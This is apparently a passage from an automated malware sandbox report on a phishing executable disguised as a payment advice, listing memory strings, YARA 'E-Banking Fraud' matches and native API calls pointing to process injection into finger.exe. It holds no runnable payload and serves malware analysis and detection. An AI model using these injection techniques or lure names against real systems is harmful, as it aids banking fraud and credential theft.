                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: finger.exe, 00000009.00000002.3551915780.0000000003498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 00000009.00000002.3551915780.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 00000009.00000003.2416542172.00000000081A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: finger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0042CD93 NtClose,4_2_0042CD93
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2B60 NtClose,LdrInitializeThunk,4_2_016E2B60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_016E2DF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_016E2C70
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E35C0 NtCreateMutant,LdrInitializeThunk,4_2_016E35C0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E4340 NtSetContextThread,4_2_016E4340
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E4650 NtSuspendThread,4_2_016E4650
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BE0 NtQueryValueKey,4_2_016E2BE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BF0 NtAllocateVirtualMemory,4_2_016E2BF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2BA0 NtEnumerateValueKey,4_2_016E2BA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2B80 NtQueryInformationFile,4_2_016E2B80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AF0 NtWriteFile,4_2_016E2AF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AD0 NtReadFile,4_2_016E2AD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2AB0 NtWaitForSingleObject,4_2_016E2AB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D30 NtUnmapViewOfSection,4_2_016E2D30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D00 NtSetInformationFile,4_2_016E2D00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2D10 NtMapViewOfSection,4_2_016E2D10
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DD0 NtDelayExecution,4_2_016E2DD0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2DB0 NtEnumerateKey,4_2_016E2DB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C60 NtCreateKey,4_2_016E2C60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2C00 NtQueryInformationProcess,4_2_016E2C00
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CF0 NtOpenProcess,4_2_016E2CF0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CC0 NtQueryVirtualMemory,4_2_016E2CC0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2CA0 NtQueryInformationToken,4_2_016E2CA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F60 NtCreateProcessEx,4_2_016E2F60
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F30 NtCreateSection,4_2_016E2F30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FE0 NtCreateFile,4_2_016E2FE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FA0 NtQuerySection,4_2_016E2FA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2FB0 NtResumeThread,4_2_016E2FB0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2F90 NtProtectVirtualMemory,4_2_016E2F90
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2E30 NtWriteVirtualMemory,4_2_016E2E30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2EE0 NtQueueApcThread,4_2_016E2EE0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2EA0 NtAdjustPrivilegesToken,4_2_016E2EA0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E2E80 NtReadVirtualMemory,4_2_016E2E80
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E3010 NtOpenDirectoryObject,4_2_016E3010
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_016E3090 NtSetValueKey,4_2_016E3090
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_016E39B0 NtGetContextThread,4_2_016E39B0
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_016E3D70 NtOpenThread,4_2_016E3D70
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Code function: 4_2_016E3D10 NtOpenProcessToken,4_2_016E3D10
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A34340 NtSetContextThread,LdrInitializeThunk,9_2_03A34340
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A34650 NtSuspendThread,LdrInitializeThunk,9_2_03A34650
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03A32BA0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03A32BE0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03A32BF0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32B60 NtClose,LdrInitializeThunk,9_2_03A32B60
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32AF0 NtWriteFile,LdrInitializeThunk,9_2_03A32AF0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32AD0 NtReadFile,LdrInitializeThunk,9_2_03A32AD0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32FB0 NtResumeThread,LdrInitializeThunk,9_2_03A32FB0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32FE0 NtCreateFile,LdrInitializeThunk,9_2_03A32FE0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32F30 NtCreateSection,LdrInitializeThunk,9_2_03A32F30
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03A32E80
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03A32EE0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03A32DF0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32DD0 NtDelayExecution,LdrInitializeThunk,9_2_03A32DD0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03A32D30
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03A32D10
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03A32CA0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32C60 NtCreateKey,LdrInitializeThunk,9_2_03A32C60
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03A32C70
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A335C0 NtCreateMutant,LdrInitializeThunk,9_2_03A335C0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A339B0 NtGetContextThread,LdrInitializeThunk,9_2_03A339B0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32B80 NtQueryInformationFile,9_2_03A32B80
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32AB0 NtWaitForSingleObject,9_2_03A32AB0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32FA0 NtQuerySection,9_2_03A32FA0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32F90 NtProtectVirtualMemory,9_2_03A32F90
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32F60 NtCreateProcessEx,9_2_03A32F60
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32EA0 NtAdjustPrivilegesToken,9_2_03A32EA0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32E30 NtWriteVirtualMemory,9_2_03A32E30
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32DB0 NtEnumerateKey,9_2_03A32DB0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32D00 NtSetInformationFile,9_2_03A32D00
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32CF0 NtOpenProcess,9_2_03A32CF0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32CC0 NtQueryVirtualMemory,9_2_03A32CC0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A32C00 NtQueryInformationProcess,9_2_03A32C00
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A33090 NtSetValueKey,9_2_03A33090
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A33010 NtOpenDirectoryObject,9_2_03A33010
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A33D10 NtOpenProcessToken,9_2_03A33D10
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_03A33D70 NtOpenThread,9_2_03A33D70
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F69760 NtReadFile,9_2_02F69760
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F695F0 NtCreateFile,9_2_02F695F0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F69A60 NtAllocateVirtualMemory,9_2_02F69A60
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F698F0 NtClose,9_2_02F698F0
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_02F69850 NtDeleteFile,9_2_02F69850
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_0386FB66 NtSetContextThread,9_2_0386FB66
                Source: C:\Windows\SysWOW64\finger.exe Code function: 9_2_0386F9B8 NtClose,9_2_0386F9B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A1FDC09_2_03A1FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB7D739_2_03AB7D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A03D409_2_03A03D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03AB1D5A9_2_03AB1D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03ABFCF29_2_03ABFCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_03A79C329_2_03A79C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F520C09_2_02F520C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F587A09_2_02F587A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F625709_2_02F62570
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4CFB09_2_02F4CFB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4CFA89_2_02F4CFA8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4B3009_2_02F4B300
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4D1D09_2_02F4D1D0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F4B1B09_2_02F4B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F557909_2_02F55790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F557909_2_02F55790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F539909_2_02F53990
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_02F6BF309_2_02F6BF30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E3289_2_0386E328
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E7DC9_2_0386E7DC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386E4439_2_0386E443
                Source: C:\Windows\SysWOW64\finger.exeCode function: 9_2_0386D8A89_2_0386D8A8
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A35130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 039EB970 appears 262 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A47E54 appears 107 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03A7F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0171EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0172F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 0169B970 appears 262 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 016F7E54 appears 107 times
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: String function: 016E5130 appears 58 times
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe Binary or memory string: OriginalFilename vs Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
